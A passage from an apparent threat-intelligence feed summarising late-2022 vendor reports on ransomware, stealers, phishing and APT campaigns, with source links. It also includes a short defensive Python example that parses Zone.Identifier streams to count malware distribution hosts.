Source: https://blog.reversinglabs.com/blog/zetanile-open-source-software-trojans-from-north-korea
2022-12-02
The_cyber_espionage_activity_with_USB_devices
MEDIUM
+
Intel Source:
Mandiant
Intel Name:
The_cyber_espionage_activity_with_USB_devices
Date of Scan:
2022-12-02
Impact:
MEDIUM
Summary:
Mandiant Managed Defense recently identified cyber espionage activity that heavily leverages USB devices as an initial infection vector and concentrates on the Philippines. Mandiant tracks this activity as UNC4191 and assesses that it is possibly linked to a China nexus.
Source: https://www.mandiant.com/resources/blog/china-nexus-espionage-southeast-asia
2022-12-02
The_delivery_of_YIPPHB_dropper
LOW
+
Intel Source:
Elastic
Intel Name:
The_delivery_of_YIPPHB_dropper
Date of Scan:
2022-12-02
Impact:
LOW
Summary:
Elastic Security Labs identified 12 clusters of activity using a similar TTP of threading Base64-encoded strings with Unicode icons to load the YIPPHB dropper. YIPPHB is an unsophisticated but effective dropper used to deliver RAT implants since at least May 2022.
Source: https://www.elastic.co/es/security-labs/doing-time-with-the-yipphb-dropper
2022-12-02
Phishing_and_Scams_to_Be_Aware_of_this_Season
LOW
+
Intel Source:
Trustwave
Intel Name:
Phishing_and_Scams_to_Be_Aware_of_this_Season
Date of Scan:
2022-12-02
Impact:
LOW
Summary:
Trustwave has warned users to be on the lookout this holiday shopping season for phishing and scams specifically designed to blend in with holiday online shopping activity. Trustwave SpiderLabs has compiled a list of the most prevalent shopping-related scams expected this year; the samples were recently observed in Trustwave's spam traps and other monitoring systems.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tis-the-season-for-online-shopping-and-phishing-scams/
2022-12-02
Mizuho_Bank_of_Japan_as_bait_for_Lazarus_attack
LOW
+
Intel Source:
Weixin
Intel Name:
Mizuho_Bank_of_Japan_as_bait_for_Lazarus_attack
Date of Scan:
2022-12-02
Impact:
LOW
Summary:
The Red Raindrop team of QiAnXin Threat Intelligence Center recently found, during routine threat hunting, a new Lazarus attack sample that had zero antivirus detections at the time of discovery. The sample uses information about Mizuho Bank of Japan as bait.
Source: https://mp.weixin.qq.com/s/nnLqUBPX8xZ3hCr5u-iSjQ
2022-12-02
The_analyses_of_Erbium_Stealer_Malware
MEDIUM
+
Intel Source:
Cyfirma
Intel Name:
The_analyses_of_Erbium_Stealer_Malware
Date of Scan:
2022-12-02
Impact:
MEDIUM
Summary:
The CYFIRMA research team observed and analyzed an Erbium Stealer sample and has also seen the stealer advertised on Russian-speaking hacker forums. The sample is a 32-bit executable whose contents are obfuscated to evade detection by security products and firewalls.
Source: https://www.cyfirma.com/outofband/erbium-stealer-malware-report/
2022-12-02
A_released_joint_Cybersecurity_Advisory_for_Cuba_Ransomware
MEDIUM
+
Intel Source:
CISA
Intel Name:
A_released_joint_Cybersecurity_Advisory_for_Cuba_Ransomware
Date of Scan:
2022-12-02
Impact:
MEDIUM
Summary:
The FBI and CISA released a joint Cybersecurity Advisory (CSA) to provide network defenders with the tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with Cuba ransomware.
Source: https://www.cisa.gov/uscert/ncas/current-activity/2022/12/01/stopransomware-cuba-ransomware
2022-12-02
New_CryWiper_Trojan
MEDIUM
+
Intel Source:
Securelist
Intel Name:
New_CryWiper_Trojan
Date of Scan:
2022-12-02
Impact:
MEDIUM
Summary:
Kaspersky researchers (Securelist) detected attempts by a previously unknown Trojan, which they named CryWiper, to attack an organization's network in the Russian Federation. After studying a sample, they found that although the Trojan disguises itself as ransomware and extorts money from the victim for "decrypting" data, it does not encrypt anything but purposefully destroys the data on the affected system. Analysis of the program code showed that this was not a developer mistake but the author's original intention.
Source: https://securelist.ru/novyj-troyanec-crywiper/106114/
2022-12-01
The_distribution_of_Redline_Stealer
LOW
+
Intel Source:
Cyble
Intel Name:
The_distribution_of_Redline_Stealer
Date of Scan:
2022-12-01
Impact:
LOW
Summary:
Cyble researchers recently identified six phishing sites impersonating ExpressVPN that were distributing RedLine Stealer for Windows. The threat actors used phishing emails, online ads, SEO poisoning, and various other means to propagate the links across the internet.
Source: https://blog.cyble.com/2022/11/30/redline-stealer-being-distributed-via-fake-express-vpn-sites/
2022-12-01
Arechclient2_remote_access_trojan
LOW
+
Intel Source:
Cyber Florida
Intel Name:
Arechclient2_remote_access_trojan
Date of Scan:
2022-12-01
Impact:
LOW
Summary:
Cyber Florida has observed Arechclient2 network payload data obfuscated with Base64 encoding and sent to what appears to be a command-and-control server, which in turn appears to be hosted on Google Cloud services.
Source: https://cyberflorida.org/2022/11/arechclient2/
2022-12-01
New_Malware_Strain_DuckLogs
LOW
+
Intel Source:
Cyble
Intel Name:
New_Malware_Strain_DuckLogs
Date of Scan:
2022-12-01
Impact:
LOW
Summary:
Cyble researchers recently observed a new malware strain named DuckLogs, which performs multiple malicious functions: stealer, keylogger, clipper, remote access, and more. DuckLogs is sold as Malware-as-a-Service (MaaS). It steals users' sensitive information, such as passwords, cookies, login data, browsing histories and crypto wallet details, and exfiltrates the stolen data from the victim's machine to its C&C server.
Source: https://blog.cyble.com/2022/12/01/ducklogs-new-malware-strain-spotted-in-the-wild/
2022-11-30
A_technical_analysis_of_the_Dolphin_backdoor
LOW
+
Intel Source:
WeliveSecurity
Intel Name:
A_technical_analysis_of_the_Dolphin_backdoor
Date of Scan:
2022-11-30
Impact:
LOW
Summary:
ESET researchers have analyzed a previously unreported backdoor used by the ScarCruft APT group. The backdoor, which was named Dolphin, has a wide range of spying capabilities, including monitoring drives and portable devices and exfiltrating files of interest, keylogging and taking screenshots, and stealing credentials from browsers.
Source: https://www.welivesecurity.com/2022/11/30/whos-swimming-south-korean-waters-meet-scarcrufts-dolphin/
2022-11-30
IoT_Botnets_Evade_Detection_and_Analysis_Part_2
LOW
+
Intel Source:
Nozomi Networks
Intel Name:
IoT_Botnets_Evade_Detection_and_Analysis_Part_2
Date of Scan:
2022-11-30
Impact:
LOW
Summary:
Nozomi Networks researchers analyzed the malware samples and discovered new modification techniques that malware authors use to evade detection. The authors are also adopting new methods for crafting malicious files, exploiting a variety of vulnerabilities in IoT devices, and using command-and-control (C&C) servers to maintain control of compromised devices.
Source: https://www.nozominetworks.com/blog/how-iot-botnets-evade-detection-and-analysis-part-2/
2022-11-30
Domains_Used_for_Magniber_Distribution_in_Korea
LOW
+
Intel Source:
ASEC
Intel Name:
Domains_Used_for_Magniber_Distribution_in_Korea
Date of Scan:
2022-11-30
Impact:
LOW
Summary:
The ASEC analysis team had earlier introduced, in a blog post, Magniber ransomware attempting to bypass MOTW (Mark of the Web). Using the data left in the Zone.Identifier alternate data stream of the samples, they then investigated the sources used for Magniber distribution.
Source: https://asec.ahnlab.com/en/43008/
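As an added example of the investigation technique described above (not code from the ASEC post), the block below parses the INI-style text that Windows writes into a downloaded file's Zone.Identifier stream and aggregates the HostUrl/ReferrerUrl hostnames of Internet-zone files, which is how distribution sources can be attributed from the samples themselves. The sample streams and hostnames are constructed for the example; the zone id meanings are the standard Windows URL security zones.

```python
import configparser
from collections import Counter
from urllib.parse import urlsplit

# URL security zone ids as written by Windows into the Zone.Identifier stream.
ZONE_NAMES = {0: "LocalMachine", 1: "LocalIntranet", 2: "TrustedSites",
              3: "Internet", 4: "RestrictedSites"}


def parse_zone_identifier(text: str) -> dict:
    """Parse the text of a Zone.Identifier alternate data stream.

    The stream is a small INI file with a [ZoneTransfer] section holding
    ZoneId and, for browser downloads, ReferrerUrl and HostUrl.
    """
    # '=' only: a ':' inside a URL must not be taken as a key separator.
    parser = configparser.ConfigParser(delimiters=("=",), interpolation=None,
                                       strict=False)
    parser.read_string(text)
    if "ZoneTransfer" not in parser:
        raise ValueError("no [ZoneTransfer] section")
    section = parser["ZoneTransfer"]
    zone_id = int(section.get("ZoneId", "-1"))
    return {
        "zone_id": zone_id,
        "zone": ZONE_NAMES.get(zone_id, "Unknown"),
        "referrer_url": section.get("ReferrerUrl") or None,
        "host_url": section.get("HostUrl") or None,
    }


def read_zone_identifier(path: str) -> str:
    """Read the stream from an NTFS file (Windows only; not used offline)."""
    with open(path + ":Zone.Identifier", encoding="utf-8",
              errors="replace") as stream:
        return stream.read()


def distribution_hosts(streams) -> Counter:
    """Count hostnames seen in HostUrl/ReferrerUrl of Internet-zone files."""
    hosts = Counter()
    for text in streams:
        try:
            info = parse_zone_identifier(text)
        except (ValueError, configparser.Error):
            continue  # malformed or stripped stream: nothing to attribute
        if info["zone_id"] != 3:
            continue  # intranet/trusted downloads are out of scope here
        for url in (info["host_url"], info["referrer_url"]):
            host = urlsplit(url).hostname if url else None
            if host:
                hosts[host] += 1
    return hosts


# Constructed sample streams (not data from the ASEC investigation).
SAMPLE_STREAMS = [
    "[ZoneTransfer]\r\nZoneId=3\r\nReferrerUrl=https://example-portal.test/\r\n"
    "HostUrl=https://dl.example-cdn.test/files/update.msi\r\n",
    "[ZoneTransfer]\r\nZoneId=3\r\n"
    "HostUrl=http://dl.example-cdn.test/files/win_update.zip\r\n",
    "[ZoneTransfer]\r\nZoneId=1\r\nHostUrl=http://fileserver.corp.test/tools.zip\r\n",
    "garbage",
]

if __name__ == "__main__":
    for host, count in distribution_hosts(SAMPLE_STREAMS).most_common():
        print(f"{count:3d}  {host}")
```

Files extracted from archives or written by installers often carry no stream, or a stream without URLs, which is why the aggregation skips anything it cannot parse rather than failing.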
2022-11-30
The_ransomware_impact_on_Aviation_Industry
LOW
+
Intel Source:
Cyble
Intel Name:
The_ransomware_impact_on_Aviation_Industry
Date of Scan:
2022-11-30
Impact:
LOW
Summary:
This month the ‘Daixin Team’ ransomware group claimed to infiltrate the networks of a Malaysia-based airline. The group allegedly stole 5 million passengers’ data, and airline employees’ personal and corporate information. ‘Daixin Team’ ransomware group came into existence in June 2022 and has claimed responsibility for targeting 5 organizations so far. In the US, the group has primarily affected Healthcare organizations.
Source: https://blog.cyble.com/2022/11/23/aviation-industry-facing-ransomware-headwinds/
2022-11-30
Phishing_Website_Disguised_as_a_Famous_Korean_Email_Login_Website_Being_Distributed
LOW
+
Intel Source:
ASEC
Intel Name:
Phishing_Website_Disguised_as_a_Famous_Korean_Email_Login_Website_Being_Distributed
Date of Scan:
2022-11-30
Impact:
LOW
Summary:
The ASEC analysis team has identified the distribution of a malicious website in Korea that aims to steal account credentials from a famous Korean email service website.
Source: https://asec.ahnlab.com/en/42999/
2022-11-30
Improved_LockBit_3_0_Black_attacks_with_more_capabilities
MEDIUM
+
Intel Source:
Sophos
Intel Name:
Improved_LockBit_3_0_Black_attacks_with_more_capabilities
Date of Scan:
2022-11-30
Impact:
MEDIUM
Summary:
A Sophos team analyzed multiple incidents in which attackers used the latest version of LockBit ransomware (known variously as LockBit 3.0 or 'LockBit Black') and documented the latest tooling used by the threat actors. The actors have begun experimenting with scripting that would allow the malware to "self-spread" using Windows Group Policy Objects (GPO) or PsExec, potentially making it easier for the malware to move laterally and infect computers without affiliates needing to know how to use these features themselves.
Source: https://news.sophos.com/en-us/2022/11/30/lockbit-3-0-black-attacks-and-leaks-reveal-wormable-capabilities-and-tooling/
2022-11-29
Word_Document_Attack_Distributed_as_Normal_MS_Office_URLs
LOW
+
Intel Source:
ASEC
Intel Name:
Word_Document_Attack_Distributed_as_Normal_MS_Office_URLs
Date of Scan:
2022-11-29
Impact:
LOW
Summary:
During additional monitoring, the ASEC analysis team discovered that the URL used in the fake Word document is now very cleverly disguised to closely resemble a legitimate Microsoft Office URL, and advises users to be cautious.
Source: https://asec.ahnlab.com/en/42554/
2022-11-29
LNK_File_Leads_to_Domain_Wide_Ransomware
MEDIUM
+
Intel Source:
DFIR Report
Intel Name:
LNK_File_Leads_to_Domain_Wide_Ransomware
Date of Scan:
2022-11-29
Impact:
MEDIUM
Summary:
Researchers from The DFIR Report have documented a threat actor gaining access to an environment via Emotet and operating over an eight-day period. During this time, multiple rounds of enumeration and lateral movement occurred using Cobalt Strike, and remote access tools such as Tactical RMM and AnyDesk were used for command and control.
Source: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
2022-11-29
Massive_malvertising_campaign_capitalize_on_Black_Friday
MEDIUM
+
Intel Source:
Malwarebytes
Intel Name:
Massive_malvertising_campaign_capitalize_on_Black_Friday
Date of Scan:
2022-11-29
Impact:
MEDIUM
Summary:
Researchers from Malwarebytes have identified an ongoing malvertising campaign that has been ramping up fraudulent Google ads for the popular Walmart brand. Likely because of the upcoming Black Friday deals, they are seeing a dramatic increase in traffic to a number of malicious sites registered for the purpose of serving tech support scams.
Source: https://www.malwarebytes.com/blog/threat-intelligence/2022/11/scammers-capitalize-on-black-friday-week-with-massive-malvertising-campaign
2022-11-29
New_Variant_Of_Ransomware_Targeting_Chile
MEDIUM
+
Intel Source:
Cyble
Intel Name:
New_Variant_Of_Ransomware_Targeting_Chile
Date of Scan:
2022-11-29
Impact:
MEDIUM
Summary:
Researchers from Cyble have identified a new variant of Punisher ransomware spreading through a COVID-19-themed phishing website. This strain uses a common ransom note that is downloaded from a remote server and then appends content to it to make the note specific to each victim; the note is delivered as an HTML file.
Source: https://blog.cyble.com/2022/11/25/punisher-ransomware-spreading-through-fake-covid-site/
2022-11-29
Word_Document_Attack_Distributed_in_Disguise_of_a_News_Survey
LOW
+
Intel Source:
ASEC
Intel Name:
Word_Document_Attack_Distributed_in_Disguise_of_a_News_Survey
Date of Scan:
2022-11-29
Impact:
LOW
Summary:
The ASEC analysis team discovered that the Word document type identified in the blog post 'Malicious Word Files Targeting Specific Individuals Related to North Korea' has recently been using FTP to leak user credentials. The filename of the identified Word document is 'CNA[Q].doc', disguised as an interview for CNA, a Singaporean TV program.
Source: https://asec.ahnlab.com/en/42529/
2022-11-29
China_Based_Fangxiao_Group_Running_Long_Phishing_Campaign
MEDIUM
+
Intel Source:
CYJAX
Intel Name:
China_Based_Fangxiao_Group_Running_Long_Phishing_Campaign
Date of Scan:
2022-11-29
Impact:
MEDIUM
Summary:
Researchers from CYJAX have observed that a China-based financially motivated group, dubbed Fangxiao, orchestrated a large-scale phishing campaign since 2017. The phishing campaign exploits the reputation of international brands and targets businesses in multiple industries, including retail, banking, travel, and energy. Attackers imitated over 400 organisations, including Emirates, Singapore’s Shopee, Unilever, Indonesia’s Indomie, Coca-Cola, McDonald’s, and Knorr.
Source: https://www.cyjax.com/2022/11/14/fangxiao-a-chinese-threat-actor/
2022-11-28
New_Wave_of_SocGholish_Malware
LOW
+
Intel Source:
Sucuri
Intel Name:
New_Wave_of_SocGholish_Malware
Date of Scan:
2022-11-28
Impact:
LOW
Summary:
Researchers from Sucuri have observed a new type of WordPress infection in which threat actors use a distinctive injection (the 'cid27x' injections of the post's title) to load SocGholish malware.
Source: https://blog.sucuri.net/2022/11/new-wave-of-socgholish-cid27x-injections.html
2022-11-28
The_New_Wave_of_RansomBoggs_Ransomware
LOW
+
Intel Source:
ESET Research
Intel Name:
The_New_Wave_of_RansomBoggs_Ransomware
Date of Scan:
2022-11-28
Impact:
LOW
Summary:
Researchers from ESET have identified new ransomware attacks targeting organizations in Ukraine that have been linked to the notorious Russian military threat group Sandworm.
Source: https://twitter.com/ESETresearch/status/1596181925663760386
2022-11-28
LockBit_Ransomware_Being_distributed_With_Similar_Filenames
LOW
+
Intel Source:
ASEC
Intel Name:
LockBit_Ransomware_Being_distributed_With_Similar_Filenames
Date of Scan:
2022-11-28
Impact:
LOW
Summary:
Researchers from ASEC have observed LockBit 2.0 and LockBit 3.0 are being distributed again with only a change to their filenames.
Source: https://asec.ahnlab.com/en/42890/
2022-11-28
Diving_Deep_into_Eternity_Stealer
LOW
+
Intel Source:
Cloudsek
Intel Name:
Diving_Deep_into_Eternity_Stealer
Date of Scan:
2022-11-28
Impact:
LOW
Summary:
Researchers from CloudSEK have deeply analyzed the workings of Eternity stealer and provided a basic explanation of its techniques and methods.
Source: https://cloudsek.com/technical-analysis-of-the-eternity-stealer/?utm_source=rss&utm_medium=rss&utm_campaign=technical-analysis-of-the-eternity-stealer
2022-11-25
Wiki_Ransomware_Distributing_in_Korea
LOW
+
Intel Source:
ASEC
Intel Name:
Wiki_Ransomware_Distributing_in_Korea
Date of Scan:
2022-11-25
Impact:
LOW
Summary:
ASEC researchers have identified the distribution of Wiki ransomware, determined to be a variant of Crysis ransomware, disguised as a normal program.
Source: https://asec.ahnlab.com/en/42507/
2022-11-25
Hackers_Targeting_Online_Shoppers_on_Black_Friday
MEDIUM
+
Intel Source:
Fortinet
Intel Name:
Hackers_Targeting_Online_Shoppers_on_Black_Friday
Date of Scan:
2022-11-25
Impact:
MEDIUM
Summary:
Fortinet researchers have observed two Black Friday-oriented cyber attacks that are gaining traction, one using an old PDF file and another exploiting typosquatting.
Source: https://www.fortinet.com/blog/threat-research/Beware-of-Cybercriminals-Preying-on-Online-Shoppers-on-Black-Friday?&web_view=true
2022-11-25
Koxic_Ransomware_Distributing_in_Korea
LOW
+
Intel Source:
ASEC
Intel Name:
Koxic_Ransomware_Distributing_in_Korea
Date of Scan:
2022-11-25
Impact:
LOW
Summary:
Researchers from ASEC have discovered that Koxic ransomware is being distributed in Korea. Recently, they found that a file with a modified appearance and internal ransom note had been detected.
Source: https://asec.ahnlab.com/en/42343/
2022-11-24
WannaRen_Ransomware_Targeting_Indian_Organization
LOW
+
Intel Source:
TrendMicro
Intel Name:
WannaRen_Ransomware_Targeting_Indian_Organization
Date of Scan:
2022-11-24
Impact:
LOW
Summary:
Trend Micro researchers have observed a new variant of WannaRen ransomware named Life ransomware. The new variant uses a batch file to download and execute WINWORD.exe, which performs DLL side-loading and loads the ransomware in memory.
Source: https://www.trendmicro.com/en_us/research/22/k/wannaren-returns-as-life-ransomware--targets-india.html
2022-11-24
The_Examination_of_Cryptonite_Ransomware
LOW
+
Intel Source:
Fortinet
Intel Name:
The_Examination_of_Cryptonite_Ransomware
Date of Scan:
2022-11-24
Impact:
LOW
Summary:
Researchers from Fortinet have analyzed the Cryptonite ransomware kit that exists as free and open-source software.
Source: https://www.fortinet.com/blog/threat-research/Ransomware-Roundup-Cryptonite-Ransomware?&web_view=true
2022-11-24
Phishing_Attack_Targeting_Microsoft_Users
LOW
+
Intel Source:
Cofense
Intel Name:
Phishing_Attack_Targeting_Microsoft_Users
Date of Scan:
2022-11-24
Impact:
LOW
Summary:
Researchers from Cofense have analyzed a phishing campaign that aims to steal employees' Microsoft credentials via a malicious HTML attachment. The attached file contains spliced code that, when executed, harvests the employee's credentials.
Source: https://cofense.com/blog/phishing-attack-targets-microsoft-users-via-html-attachment
2022-11-23
Fake_FIFA_World_Cup_Streaming_Sites_Targeting_Virtual_Fans
HIGH
+
Intel Source:
Zscaler
Intel Name:
Fake_FIFA_World_Cup_Streaming_Sites_Targeting_Virtual_Fans
Date of Scan:
2022-11-23
Impact:
HIGH
Summary:
Researchers from Zscaler have identified that the FIFA World Cup 2022 has brought a spike in cyber attacks targeting football fans through fake streaming sites and lottery scams, leveraging the rush and excitement around these uncommon events to infect users with malware.
Source: https://www.zscaler.com/blogs/security-research/surge-fake-fifa-world-cup-streaming-sites-targets-virtual-fans
2022-11-23
Black_Basta_Ransomware_Usin_Qakbot_Malware_to_Target_US_Companies
LOW
+
Intel Source:
Cybereason
Intel Name:
Black_Basta_Ransomware_Usin_Qakbot_Malware_to_Target_US_Companies
Date of Scan:
2022-11-23
Impact:
LOW
Summary:
Researchers from Cybereason have identified the Black Basta ransomware gang is using QakBot malware to create an initial point of entry and move laterally within an organization’s network.
Source: https://www.cybereason.com/blog/threat-alert-aggressive-qakbot-campaign-and-the-black-basta-ransomware-group-targeting-u.s.-companies
2022-11-23
New_Variant_of_RansomExx_Ransomware
LOW
+
Intel Source:
IBM Security Intelligence
Intel Name:
New_Variant_of_RansomExx_Ransomware
Date of Scan:
2022-11-23
Impact:
LOW
Summary:
IBM Security Intelligence researchers have discovered a new variant of the RansomExx ransomware that has been rewritten in the Rust programming language. Malware written in Rust often benefits from lower AV detection rates, and this may have been the primary reason for using the language.
Source: https://securityintelligence.com/posts/ransomexx-upgrades-rust/
2022-11-23
Fake_Shopping_Websites_Running_For_Black_Friday_Sales
MEDIUM
+
Intel Source:
Checkpoint
Intel Name:
Fake_Shopping_Websites_Running_For_Black_Friday_Sales
Date of Scan:
2022-11-23
Impact:
MEDIUM
Summary:
Check Point researchers have found a sharp increase in fake shopping-related websites in the run-up to Black Friday sales and warn shoppers to stay alert this Black Friday as hackers launch their own holiday specials.
Source: https://blog.checkpoint.com/2022/11/17/check-point-research-warns-shoppers-to-stay-alert-this-black-friday-as-hackers-launch-their-own-holiday-specials/
2022-11-23
Hackers_Exploiting_Unused_Boa_Web_Servers
MEDIUM
+
Intel Source:
Microsoft
Intel Name:
Hackers_Exploiting_Unused_Boa_Web_Servers
Date of Scan:
2022-11-23
Impact:
MEDIUM
Summary:
Microsoft researchers have observed that the intrusion activity aimed at Indian power grid entities earlier this year probably exploited security flaws in the now-discontinued web server Boa.
Source: https://www.microsoft.com/en-us/security/blog/2022/11/22/vulnerable-sdk-components-lead-to-supply-chain-risks-in-iot-and-ot-environments/
2022-11-22
QakBot_Malware_New_Initial_Execution
MEDIUM
+
Intel Source:
Securonix
Intel Name:
QakBot_Malware_New_Initial_Execution
Date of Scan:
2022-11-22
Impact:
MEDIUM
Summary:
Researchers from Securonix shared their observations of a recent version of the QakBot (aka Qbot) malware in which calls to the Windows binary regsvr32 are obfuscated in creative ways.
Source: https://www.securonix.com/blog/qbot-qakbot-malwares-new-initial-execution/
2022-11-22
Hackers_Leveraging_Chrome_Extension_to_Steal_Cryptocurrency_and_Passwords
LOW
+
Intel Source:
Avast
Intel Name:
Hackers_Leveraging_Chrome_Extension_to_Steal_Cryptocurrency_and_Passwords
Date of Scan:
2022-11-22
Impact:
LOW
Summary:
Researchers from Avast have identified an information-stealing Google Chrome browser extension named 'VenomSoftX' which is being deployed by Windows malware to steal cryptocurrency and clipboard contents as users browse the web.
Source: https://decoded.avast.io/janrubin/vipersoftx-hiding-in-system-logs-and-spreading-venomsoftx/
2022-11-22
Rapidly_Increasing_Aurora_InfoStealer_Malware
LOW
+
Intel Source:
Sekoia
Intel Name:
Rapidly_Increasing_Aurora_InfoStealer_Malware
Date of Scan:
2022-11-22
Impact:
LOW
Summary:
Researchers from Sekoia have identified that cybercrime gangs are increasingly turning to a new Go-based information stealer named 'Aurora' to steal sensitive information from browsers and cryptocurrency apps, exfiltrate data directly from disks, and load additional payloads.
Source: https://blog.sekoia.io/aurora-a-rising-stealer-flying-under-the-radar/
2022-11-22
Active_IoCs_of_Donot_APT_group
LOW
+
Intel Source:
Rewterz
Intel Name:
Active_IoCs_of_Donot_APT_group
Date of Scan:
2022-11-22
Impact:
LOW
Summary:
Researchers from Rewterz identified various attack campaigns by the Donot APT group targeting Pakistan and other Asian countries. The most recent campaign leverages RTF documents spread through phishing.
Source: https://www.rewterz.com/rewterz-news/rewterz-threat-alert-donot-apt-group-active-iocs-44
2022-11-22
DoubleZero_Wiper
LOW
+
Intel Source:
PaloAlto
Intel Name:
DoubleZero_Wiper
Date of Scan:
2022-11-22
Impact:
LOW
Summary:
Researchers from Palo Alto Networks Unit 42 introduce a machine learning model that predicts the maliciousness of .NET samples from specific structures in the file, illustrated by analyzing a .NET wiper named DoubleZero.
Source: https://unit42.paloaltonetworks.com/doublezero-net-wiper/
2022-11-22
Hackers_Leveraging_Adobe_Acrobat_For_Phishing_Attack
LOW
+
Intel Source:
Netskope
Intel Name:
Hackers_Leveraging_Adobe_Acrobat_For_Phishing_Attack
Date of Scan:
2022-11-22
Impact:
LOW
Summary:
Researchers from Netskope have discovered a phishing campaign that is abusing Adobe Acrobat to host a Microsoft Office phishing page.
Source: https://www.netskope.com/blog/cloud-abuse-new-technique-using-adobe-acrobat-to-host-phishing
2022-11-22
The_browser_hijacking_by_multiple_Chrome_extensions
LOW
+
Intel Source:
Cyble
Intel Name:
The_browser_hijacking_by_multiple_Chrome_extensions
Date of Scan:
2022-11-22
Impact:
LOW
Summary:
Cyble Research and Intelligence Labs (CRIL) discovered multiple Chrome extensions that compromised over two million users with Browser Hijackers. All the extensions that they found were present on the Chrome web store. After installation, it was observed that the browsers hijackers were also changing the browser’s default search engine without the users’ knowledge.
Source: https://blog.cyble.com/2022/11/22/over-2-million-users-affected-with-browser-hijackers/
2022-11-22
Hackers_Are_Active_Again_For_Festival_Season
MEDIUM
+
Intel Source:
Zscaler
Intel Name:
Hackers_Are_Active_Again_For_Festival_Season
Date of Scan:
2022-11-22
Impact:
MEDIUM
Summary:
Researchers from Zscaler have observed four emerging skimming attacks targeting e-commerce stores. These skimming campaigns have a long shelf life and manage to keep their malicious activities under the radar for several months.
Source: https://www.zscaler.com/blogs/security-research/black-friday-scams-4-emerging-skimming-attacks-watch-holiday-season
2022-11-21
Fake_Antivirus_Phishing_Campaign
LOW
+
Intel Source:
ISC.SANS
Intel Name:
Fake_Antivirus_Phishing_Campaign
Date of Scan:
2022-11-21
Impact:
LOW
Summary:
Researchers from the SANS Internet Storm Center have analyzed a phishing email that looks like a McAfee antivirus subscription notice.
Source: https://isc.sans.edu/diary/rss/29264
2022-11-21
New_Wave_of_Ransomware_Campaigns
LOW
+
Intel Source:
Cyble
Intel Name:
New_Wave_of_Ransomware_Campaigns
Date of Scan:
2022-11-21
Impact:
LOW
Summary:
Researchers from Cyble have identified three new ransomware families: AXLocker, Octocrypt, and Alice. They not only encrypt victims' files and demand a ransom payment but also steal the Discord accounts of infected users.
Source: https://blog.cyble.com/2022/11/18/axlocker-octocrypt-and-alice-leading-a-new-wave-of-ransomware-campaigns/
2022-11-21
New_Improved_Versions_of_LodaRAT
LOW
+
Intel Source:
Talos
Intel Name:
New_Improved_Versions_of_LodaRAT
Date of Scan:
2022-11-21
Impact:
LOW
Summary:
Researchers from Cisco Talos have identified several variants and altered versions of LodaRAT with updated functionality, including new code that allows it to spread to attached removable storage, a new string encoding algorithm, and the removal of "dead" functions.
Source: https://blog.talosintelligence.com/get-a-loda-this/?&web_view=true
2022-11-21
Hackers_Leveraging_FIFA_World_Cup_For_Phishing_Attack
HIGH
+
Intel Source:
Trellix
Intel Name:
Hackers_Leveraging_FIFA_World_Cup_For_Phishing_Attack
Date of Scan:
2022-11-21
Impact:
HIGH
Summary:
Researchers from Trellix have observed attackers leveraging FIFA and football-based campaigns to target organizations in Arab countries.
Source: https://www.trellix.com/en-us/about/newsroom/stories/research/email-cyberattacks-on-arab-countries-rise.html
2022-11-18
Phishing_Attack_Leveraging_Famous_Brands_to_Targeting_US_shoppers
MEDIUM
+
Intel Source:
Akamai
Intel Name:
Phishing_Attack_Leveraging_Famous_Brands_to_Targeting_US_shoppers
Date of Scan:
2022-11-18
Impact:
MEDIUM
Summary:
Akamai researchers have identified a sophisticated phishing kit that has been targeting North Americans since mid-September, using lures focused on holidays such as Labor Day and Halloween.
Source: https://www.akamai.com/blog/security-research/sophisticated-phishing-scam-abusing-holiday-sentiment
2022-11-18
W4SP_Stealer_Targeting_Python_Developers
LOW
+
Intel Source:
Checkmarx Security
Intel Name:
W4SP_Stealer_Targeting_Python_Developers
Date of Scan:
2022-11-18
Impact:
LOW
Summary:
Researchers from Checkmarx Security have identified an ongoing supply chain attack that leverages malicious Python packages to distribute malware called W4SP Stealer, with hundreds of victims ensnared to date.
Source: https://medium.com/checkmarx-security/wasp-attack-on-python-polymorphic-malware-shipping-wasp-stealer-infecting-hundreds-of-victims-10e92439d192
2022-11-18
The_Analysis_of_2022_FIFA_World_Cup_Threat
MEDIUM
+
Intel Source:
Recorded Future
Intel Name:
The_Analysis_of_2022_FIFA_World_Cup_Threat
Date of Scan:
2022-11-18
Impact:
MEDIUM
Summary:
Researchers from Recorded Future have analyzed the threat landscape ahead of the 2022 FIFA World Cup hosted in Qatar that begins on November 20, 2022.
Source: https://www.recordedfuture.com/fielding-cyber-influence-and-physical-threats-to-2022-fifa-world-cup-in-qatar
2022-11-18
Earth_Preta_Hackers_Targeting_Governments_Worldwide
MEDIUM
+
Intel Source:
TrendMicro
Intel Name:
Earth_Preta_Hackers_Targeting_Governments_Worldwide
Date of Scan:
2022-11-18
Impact:
MEDIUM
Summary:
Researchers from Trend Micro have observed that the threat group Earth Preta targets governments worldwide via spear-phishing attacks. The group abused fake Google accounts to distribute the malware via spear-phishing emails, with the malware initially stored in an archive file (such as RAR/ZIP/JAR) and distributed through Google Drive links.
Source: https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html
2022-11-18
Hive_ransomware_extorted_100M_from_over_1300_victims
MEDIUM
+
Intel Source:
CISA
Intel Name:
Hive_ransomware_extorted_100M_from_over_1300_victims
Date of Scan:
2022-11-18
Impact:
MEDIUM
Summary:
The FBI has identified that the notorious Hive ransomware gang has successfully extorted roughly $100 million from over a thousand companies since June 2021. The FBI also says that the Hive gang will deploy additional ransomware payloads on the networks of victims who refuse to pay the ransom.
Source: https://www.cisa.gov/uscert/ncas/alerts/aa22-321a
2022-11-17
The_Disneyland_Malware_Team_activity
LOW
+
Intel Source:
Krebs on Security
Intel Name:
The_Disneyland_Malware_Team_activity
Date of Scan:
2022-11-17
Impact:
LOW
Summary:
A cybercrime group calling itself the Disneyland Team has been operating dozens of phishing domains that spoof popular bank brands since March 2022. The Disneyland Team has been making liberal use of visually confusing phishing domains that spoof popular bank brands using Punycode, an Internet standard that allows web browsers to render domain names with non-Latin alphabets like Cyrillic.
Source: https://krebsonsecurity.com/2022/11/disneyland-malware-team-its-a-puny-world-after-all/?replytocom=571703
2022-11-17
Phishing_Campaign_Abusing_MS_Customer_Voice_URLs
MEDIUM
+
Intel Source:
Cofense
Intel Name:
Phishing_Campaign_Abusing_MS_Customer_Voice_URLs
Date of Scan:
2022-11-17
Impact:
MEDIUM
Summary:
